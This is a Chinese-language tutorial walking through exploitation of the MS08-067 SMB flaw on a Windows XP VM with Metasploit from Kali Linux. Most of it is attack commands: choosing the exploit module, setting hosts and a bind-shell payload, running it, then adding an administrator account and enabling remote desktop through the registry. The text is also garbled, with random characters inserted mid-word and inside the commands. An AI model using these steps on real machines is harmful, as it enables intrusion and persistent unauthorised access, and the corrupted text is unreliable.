在这里小编为大家介绍一下基于linux平台的ms08_067漏洞的利用。我用VMw瞢铍库祢are搭建了一个实杼鲴奶袒验环境,kalilinux:192.168.116.3winxp192.168.116.116要做的就是用KaliLinux里的Metasploit入侵WinXP
工具/原料
电脑(安卓手机)
linux系统(kali,bt,centos,debian,,,,,)
目标主机
方法/步骤
1、在Kali用命令msfconsole开启Metasploit(在终端里输入msfconsole)
2、然后运行命令:useexploit/windows/smb/ms08_067娄多骋能_netapi#使用MS08067漏洞攻击程序
3、setLHOST192.168.116.3#设置本地主机IP
4、setRHOST192.168.116.116#设置目标主机IP
5、setpayloadwindows/shell_bind_tcp#设置payload
6、showoptions#查看设置信息
7、exploit#实施攻击
8、攻击成功,我们得到了一个cmdshell,接下来就是新建账户了。
9、添加用户名为zeal,密码为zeal的用户,并把zeal腩柽鬣盛用户添加到管理组。接下来执行命令netstat-an看一下目标主机开放端口的情况
10、发现敛财醣沁并没有开启3389(远程桌面连接端口),我们需要手动开启。需要执行命令:REGADDHKLM\SYSTEM\CurrentControlSet\Control\Ter罪焐芡拂minal”“Server/vfDenyTSConnections/tREG_DWORD/d0/f
11、有了目标主机的cmdshell你想做什么不行吧?
12、好了演示到此完毕!